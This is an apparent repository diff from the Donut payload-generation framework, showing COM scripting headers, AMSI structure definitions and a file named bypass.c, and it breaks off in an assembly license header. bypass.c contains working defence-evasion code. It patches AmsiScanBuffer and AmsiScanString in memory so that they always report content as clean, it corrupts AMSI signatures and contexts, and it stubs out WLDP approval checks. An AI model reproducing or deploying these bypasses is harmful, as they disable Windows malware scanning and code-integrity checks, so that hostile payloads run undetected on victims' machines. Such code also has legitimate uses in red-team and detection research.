184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 } ActiveScriptSiteWindow;
302
303 typedef struct _IActiveScriptErrorVtbl {
304 BEGIN_INTERFACE
305
306 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
307 IActiveScriptError * This,
308 /* [in] */ REFIID riid,
309 /* [annotation][iid_is][out] */
310 void **ppvObject);
311
312 ULONG ( STDMETHODCALLTYPE *AddRef )(
313 IActiveScriptError * This);
314
315 ULONG ( STDMETHODCALLTYPE *Release )(
316 IActiveScriptError * This);
317
318 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
319 IActiveScriptError * This,
320 /* [out] */ EXCEPINFO *pexcepinfo);
321
322 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
323 IActiveScriptError * This,
324 /* [out] */ DWORD *pdwSourceContext,
325 /* [out] */ ULONG *pulLineNumber,
326 /* [out] */ LONG *plCharacterPosition);
327
328 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
329 IActiveScriptError * This,
330 /* [out] */ BSTR *pbstrSourceLine);
331
332 END_INTERFACE
333 } IActiveScriptErrorVtbl;
334
335 typedef struct _IActiveScriptError {
336 IActiveScriptErrorVtbl *lpVtbl;
337 } ActiveScriptError;
338
339 typedef struct _IActiveScriptSiteVtbl {
340 BEGIN_INTERFACE
341
342 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
343 IActiveScriptSite * This,
344 /* [in] */ REFIID riid,
345 /* [annotation][iid_is][out] */
346 void **ppvObject);
347
348 ULONG ( STDMETHODCALLTYPE *AddRef )(
349 IActiveScriptSite * This);
350
351 ULONG ( STDMETHODCALLTYPE *Release )(
352 IActiveScriptSite * This);
353
354 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
355 IActiveScriptSite * This,
356 /* [out] */ LCID *plcid);
357
358 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
359 IActiveScriptSite * This,
360 /* [in] */ LPCOLESTR pstrName,
361 /* [in] */ DWORD dwReturnMask,
362 /* [out] */ IUnknown **ppiunkItem,
363 /* [out] */ ITypeInfo **ppti);
364
365 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
366 IActiveScriptSite * This,
367 /* [out] */ BSTR *pbstrVersion);
368
369 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
370 IActiveScriptSite * This,
371 /* [in] */ const VARIANT *pvarResult,
372 /* [in] */ const EXCEPINFO *pexcepinfo);
373
374 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
375 IActiveScriptSite * This,
376 /* [in] */ SCRIPTSTATE ssScriptState);
377
378 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
379 IActiveScriptSite * This,
380 /* [in] */ IActiveScriptError *pscripterror);
381
382 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
383 IActiveScriptSite * This);
384
385 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
386 IActiveScriptSite * This);
387
388 END_INTERFACE
389 } IActiveScriptSiteVtbl;
390
391 typedef struct _IActiveScriptSite {
392 IActiveScriptSiteVtbl *lpVtbl;
393 ULONG m_cRef; // reference count (not part of original definition of course)
394 } ActiveScriptSite;
395
396 #ifdef _WIN64
397 #define IActiveScriptParse IActiveScriptParse64
398 #define IID_IActiveScriptParse IID_IActiveScriptParse64
399 #else
400 #define IActiveScriptParse IActiveScriptParse32
401 #define IID_IActiveScriptParse IID_IActiveScriptParse32
402 #endif
403
404 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
405
406 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
407 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
408 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
409
410 // Informs the host that the scripting engine has begun executing the script code.
411 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
412
413 // Informs the host that the scripting engine has returned from executing script code.
414 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
415
416 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
417 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
418
419 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
420 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
421
422 // Informs the host that an execution error occurred while the engine was running the script.
423 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
424
425 // Informs the host that the scripting engine has changed states.
426 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
427
428 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
429 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
430
431 // Called when the script has completed execution.
432 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
433
434 #endif
435
+182
-0
payload/amsi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef AMSI_H
32 #define AMSI_H
33
34 #include <windows.h>
35
36 DECLARE_HANDLE(HAMSICONTEXT);
37 DECLARE_HANDLE(HAMSISESSION);
38
39 typedef struct _IAmsiStream IAmsiStream;
40 typedef struct _IAntimalware IAntimalware;
41 typedef struct _IAntimalwareProvider IAntimalwareProvider;
42
43 typedef enum tagAMSI_RESULT {
44 // No detection found. Result likely not going to change after future definition update.
45 // a.k.a. known good
46 AMSI_RESULT_CLEAN = 0,
47 // No detection found. Result might change after future definition update.
48 AMSI_RESULT_NOT_DETECTED = 1,
49 // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
50 // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
51 // The large the result, the riskier to continue.
52 // Any return result equal to or larger than 32768 is consider malware and should be blocked.
53 // These values are provider specific, and may indicate malware family or ID.
54 // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
55 AMSI_RESULT_DETECTED = 32768,
56 } AMSI_RESULT;
57
58 typedef enum tagAMSI_ATTRIBUTE {
59 // Name/version/GUID string of the calling application.
60 AMSI_ATTRIBUTE_APP_NAME = 0,
61 // LPWSTR, filename, URL, script unique id etc.
62 AMSI_ATTRIBUTE_CONTENT_NAME = 1,
63 // ULONGLONG, size of the input. Mandatory.
64 AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
65 // PVOID, memory address if content is fully loaded in memory. Mandatory unless
66 // Read() is implemented instead to support on-demand content retrieval.
67 AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
68 // PVOID, session is used to associate different scan calls, e.g. if the contents
69 // to be scanned belong to the sample original script. Return nullptr if content
70 // is self-contained. Mandatory.
71 AMSI_ATTRIBUTE_SESSION = 4,
72 } AMSI_ATTRIBUTE;
73
74 typedef struct IAmsiStreamVtbl {
75 BEGIN_INTERFACE
76
77 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
78 IAmsiStream * This,
79 REFIID riid,
80 void **ppvObject);
81
82 ULONG ( STDMETHODCALLTYPE *AddRef )(
83 IAmsiStream * This);
84
85 ULONG ( STDMETHODCALLTYPE *Release )(
86 IAmsiStream * This);
87
88 HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
89 IAmsiStream * This,
90 AMSI_ATTRIBUTE attribute,
91 ULONG dataSize,
92 unsigned char *data,
93 ULONG *retData);
94
95 HRESULT ( STDMETHODCALLTYPE *Read )(
96 IAmsiStream * This,
97 ULONGLONG position,
98 ULONG size,
99 unsigned char *buffer,
100 ULONG *readSize);
101
102 END_INTERFACE
103 } IAmsiStreamVtbl;
104
105 typedef struct _IAmsiStream {
106 IAmsiStreamVtbl *lpVtbl;
107 } AmsiStream;
108
109 typedef struct IAntimalwareProviderVtbl {
110 BEGIN_INTERFACE
111
112 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
113 IAntimalwareProvider * This,
114 REFIID riid,
115 void **ppvObject);
116
117 ULONG ( STDMETHODCALLTYPE *AddRef )(
118 IAntimalwareProvider * This);
119
120 ULONG ( STDMETHODCALLTYPE *Release )(
121 IAntimalwareProvider * This);
122
123 HRESULT ( STDMETHODCALLTYPE *Scan )(
124 IAntimalwareProvider * This,
125 IAmsiStream *stream,
126 AMSI_RESULT *result);
127
128 void ( STDMETHODCALLTYPE *CloseSession )(
129 IAntimalwareProvider * This,
130 ULONGLONG session);
131
132 HRESULT ( STDMETHODCALLTYPE *DisplayName )(
133 IAntimalwareProvider * This,
134 LPWSTR *displayName);
135
136 END_INTERFACE
137 } IAntimalwareProviderVtbl;
138
139 typedef struct _IAntimalwareProvider {
140 IAntimalwareProviderVtbl *lpVtbl;
141 } AntimalwareProvider;
142
143 typedef struct IAntimalwareVtbl {
144 BEGIN_INTERFACE
145
146 HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
147 IAntimalware *This,
148 REFIID riid,
149 void **ppvObject);
150
151 ULONG ( STDMETHODCALLTYPE *AddRef )(
152 IAntimalware * This);
153
154 ULONG ( STDMETHODCALLTYPE *Release )(
155 IAntimalware * This);
156
157 HRESULT ( STDMETHODCALLTYPE *Scan )(
158 IAntimalware * This,
159 IAmsiStream *stream,
160 AMSI_RESULT *result,
161 IAntimalwareProvider **provider);
162
163 void ( STDMETHODCALLTYPE *CloseSession )(
164 IAntimalware * This,
165 ULONGLONG session);
166
167 END_INTERFACE
168 } IAntimalwareVtbl;
169
170 typedef struct _IAntimalware {
171 IAntimalwareVtbl *lpVtbl;
172 } Antimalware;
173
174 typedef struct tagHAMSICONTEXT {
175 DWORD Signature; // "AMSI" or 0x49534D41
176 PWCHAR AppName; // set by AmsiInitialize
177 IAntimalware *Antimalware; // set by AmsiInitialize
178 DWORD SessionCount; // increased by AmsiOpenSession
179 } _HAMSICONTEXT, *_PHAMSICONTEXT;
180
181 #endif
+373
-0
payload/bypass.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 typedef enum _WLDP_HOST_ID {
32 WLDP_HOST_ID_UNKNOWN = 0,
33 WLDP_HOST_ID_GLOBAL = 1,
34 WLDP_HOST_ID_VBA = 2,
35 WLDP_HOST_ID_WSH = 3,
36 WLDP_HOST_ID_POWERSHELL = 4,
37 WLDP_HOST_ID_IE = 5,
38 WLDP_HOST_ID_MSI = 6,
39 WLDP_HOST_ID_MAX = 7
40 } WLDP_HOST_ID, *PWLDP_HOST_ID;
41
42 typedef struct _WLDP_HOST_INFORMATION {
43 DWORD dwRevision;
44 WLDP_HOST_ID dwHostId;
45 PCWSTR szSource;
46 HANDLE hSource;
47 } WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
48
49 #if defined(BYPASS_AMSI_A)
50
51 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
52 HRESULT WINAPI AmsiScanBufferStub(
53 HAMSICONTEXT amsiContext,
54 PVOID buffer,
55 ULONG length,
56 LPCWSTR contentName,
57 HAMSISESSION amsiSession,
58 AMSI_RESULT *result)
59 {
60 *result = AMSI_RESULT_CLEAN;
61 return S_OK;
62 }
63
64 // This function is never called. It's simply used to calculate
65 // the length of AmsiScanBufferStub above.
66 //
67 // The reason it performs a multiplication is because MSVC can identify
68 // functions that perform the same operation and eliminate duplicates
69 // from the compiled code. Null subroutines are eliminated.
70
71 int AmsiScanBufferStubEnd(int a, int b) {
72 return a * b;
73 }
74
75 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
76 HRESULT WINAPI AmsiScanStringStub(
77 HAMSICONTEXT amsiContext,
78 LPCWSTR string,
79 LPCWSTR contentName,
80 HAMSISESSION amsiSession,
81 AMSI_RESULT *result)
82 {
83 *result = AMSI_RESULT_CLEAN;
84 return S_OK;
85 }
86
87 int AmsiScanStringStubEnd(int a, int b) {
88 return a + b;
89 }
90
91 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
92 HMODULE dll;
93 DWORD len, op, t;
94 LPVOID cs;
95
96 // try load amsi. if unable, assume DLL doesn't exist
97 // and return TRUE to indicate it's okay to continue
98 dll = inst->api.LoadLibraryA(inst->amsi.s);
99 if(dll == NULL) return TRUE;
100
101 // resolve address of AmsiScanBuffer. if not found,
102 // return FALSE because it should exist ...
103 cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
104 if(cs == NULL) return FALSE;
105
106 // calculate length of stub
107 len = (ULONG_PTR)AmsiScanBufferStubEnd -
108 (ULONG_PTR)AmsiScanBufferStub;
109
110 DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
111
112 // check for negative length. this would only happen when
113 // compiler decides to re-order functions.
114 if((int)len < 0) return FALSE;
115
116 // make the memory writeable. return FALSE on error
117 if(!inst->api.VirtualProtect(
118 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
119
120 DPRINT("Overwriting AmsiScanBuffer");
121 // over write with virtual address of stub
122 Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
123 // set memory back to original protection
124 inst->api.VirtualProtect(cs, len, op, &t);
125
126 // resolve address of AmsiScanString. if not found,
127 // return FALSE because it should exist ...
128 cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
129 if(cs == NULL) return FALSE;
130
131 // calculate length of stub
132 len = (ULONG_PTR)AmsiScanStringStubEnd -
133 (ULONG_PTR)AmsiScanStringStub;
134
135 DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
136
137 // check for negative length. this would only happen when
138 // compiler decides to re-order functions.
139 if((int)len < 0) return FALSE;
140
141 // make the memory writeable
142 if(!inst->api.VirtualProtect(
143 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
144
145 DPRINT("Overwriting AmsiScanString");
146 // over write with virtual address of stub
147 Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
148 // set memory back to original protection
149 inst->api.VirtualProtect(cs, len, op, &t);
150
151 return TRUE;
152 }
153
154 #elif defined(BYPASS_AMSI_B)
155
156 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
157 HMODULE dll;
158 PBYTE cs;
159 DWORD i, op, t;
160 BOOL disabled = FALSE;
161 PDWORD Signature;
162
163 // try load amsi. if unable to load, assume
164 // it doesn't exist and return TRUE to indicate
165 // it's okay to continue.
166 dll = inst->api.LoadLibraryA(inst->amsi.s);
167 if(dll == NULL) return TRUE;
168
169 // resolve address of AmsiScanBuffer. if unable, return
170 // FALSE because it should exist.
171 cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
172 if(cs == NULL) return FALSE;
173
174 // scan for signature
175 for(i=0;;i++) {
176 Signature = (PDWORD)&cs[i];
177 // is it "AMSI"?
178 if(*Signature == inst->amsi.w[0]) {
179 // set memory protection for write access
180 inst->api.VirtualProtect(cs, sizeof(DWORD),
181 PAGE_EXECUTE_READWRITE, &op);
182
183 // change signature
184 *Signature++;
185
186 // set memory back to original protection
187 inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
188 disabled = TRUE;
189 break;
190 }
191 }
192 return disabled;
193 }
194
195 #elif defined(BYPASS_AMSI_C)
196
197 // Attempt to find AMSI context in .data section of CLR.dll
198 // Could also scan PEB.ProcessHeap for this..
199 // Disabling AMSI via AMSI context is based on idea by Matt Graeber
200 // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
201
202 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
203 LPVOID clr;
204 BOOL disabled = FALSE;
205 PIMAGE_DOS_HEADER dos;
206 PIMAGE_NT_HEADERS nt;
207 PIMAGE_SECTION_HEADER sh;
208 DWORD i, j, res;
209 PBYTE ds;
210 MEMORY_BASIC_INFORMATION mbi;
211 _PHAMSICONTEXT ctx;
212
213 // get address of CLR.dll. if unable, this
214 // probably isn't a dotnet assembly being loaded
215 clr = inst->api.GetModuleHandleA(inst->clr);
216 if(clr == NULL) return FALSE;
217
218 dos = (PIMAGE_DOS_HEADER)clr;
219 nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
220 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
221 nt->FileHeader.SizeOfOptionalHeader);
222
223 // scan all writeable segments while disabled == FALSE
224 for(i = 0;
225 i < nt->FileHeader.NumberOfSections && !disabled;
226 i++)
227 {
228 // if this section is writeable, assume it's data
229 if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
230 // scan section for pointers to the heap
231 ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
232
233 for(j = 0;
234 j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
235 j += sizeof(ULONG_PTR))
236 {
237 // get pointer
238 ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
239 // query if the pointer
240 res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
241 if(res != sizeof(mbi)) continue;
242
243 // if it's a pointer to heap or stack
244 if ((mbi.State == MEM_COMMIT ) &&
245 (mbi.Type == MEM_PRIVATE ) &&
246 (mbi.Protect == PAGE_READWRITE))
247 {
248 ctx = (_PHAMSICONTEXT)ptr;
249 // check if it contains the signature
250 if(ctx->Signature == inst->amsi.w[0]) {
251 // corrupt it
252 ctx->Signature++;
253 disabled = TRUE;
254 break;
255 }
256 }
257 }
258 }
259 }
260 return disabled;
261 }
262
263 #elif defined(BYPASS_AMSI_D)
264 // This is where you may define your own AMSI bypass.
265 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined.
266
267 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
268
269 }
270
271 #endif
272
273 #if defined(BYPASS_WLDP_A)
274
275 // fake function that always returns S_OK and isApproved = TRUE
276 HRESULT WINAPI WldpIsClassInApprovedListStub(
277 REFCLSID classID,
278 PWLDP_HOST_INFORMATION hostInformation,
279 PBOOL isApproved,
280 DWORD optionalFlags)
281 {
282 *isApproved = TRUE;
283 return S_OK;
284 }
285
286 // make sure prototype is different from other null subroutines
287 // to avoid duplication by MSVC
288 int WldpIsClassInApprovedListStubEnd(int a, int b) {
289 return a - b;
290 }
291
292 // fake function that always returns S_OK
293 HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
294 HANDLE fileHandle,
295 PVOID baseImage,
296 ULONG ImageSize)
297 {
298 return S_OK;
299 }
300
301 int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
302 return a / b;
303 }
304
305 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
306 HMODULE wldp;
307 DWORD len, op, t;
308 LPVOID cs;
309
310 // try load wldp. if unable, assume DLL doesn't exist
311 // and return TRUE to indicate it's okay to continue
312 wldp = inst->api.LoadLibraryA(inst->wldp);
313 if(wldp == NULL) return TRUE;
314
315 // resolve address of WldpQueryDynamicCodeTrust
316 // if not found, return FALSE because it should exist
317 cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
318 if(cs == NULL) return FALSE;
319
320 // calculate length of stub
321 len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
322 (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
323
324 DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
325
326 // check for negative length. this would only happen when
327 // compiler decides to re-order functions.
328 if((int)len < 0) return FALSE;
329
330 // make the memory writeable. return FALSE on error
331 if(!inst->api.VirtualProtect(
332 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
333
334 // overwrite with virtual address of stub
335 Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
336 // set back to original protection
337 inst->api.VirtualProtect(cs, len, op, &t);
338
339 // resolve address of WldpIsClassInApprovedList
340 // if not found, return FALSE because it should exist
341 cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
342 if(cs == NULL) return FALSE;
343
344 // calculate length of stub
345 len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
346 (ULONG_PTR)WldpIsClassInApprovedListStub;
347
348 DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
349
350 // check for negative length. this would only happen when
351 // compiler decides to re-order functions.
352 if((int)len < 0) return FALSE;
353
354 // make the memory writeable. return FALSE on error
355 if(!inst->api.VirtualProtect(
356 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
357
358 // overwrite with virtual address of stub
359 Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
360 // set back to original protection
361 inst->api.VirtualProtect(cs, len, op, &t);
362
363 return TRUE;
364 }
365 #elif defined(BYPASS_WLDP_B)
366 // This is where you may define your own WLDP bypass.
367 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined.
368
369 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
370
371 }
372 #endif
+121
-0
payload/call_api.asm less more
0 ;
1 ; Copyright © 2019 TheWover, Odzhan. All Rights Reserved.
2 ;
3 ; Redistribution and use in source and binary forms, with or without
4 ; modification, are permitted provided that the following conditions are
5 ; met:
6 ;
7 ; 1. Redistributions of source code must retain the above copyright
8 ; notice, this list of conditions and the following disclaimer.
9 ;
10 ; 2. Redistributions in binary form must reproduce the above copyright
11 ; notice, this list of conditions and the following disclaimer in the
12 ; documentation and/or other materials provided with the distribution.
13 ;
14 ; 3. The name of the author may not be used to endorse or promote products
15 ; derived from this software without specific prior written permission.
16 ;
17 ; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
18 ; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
19 ; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
20 ; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
21 ; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
22 ; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 ; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
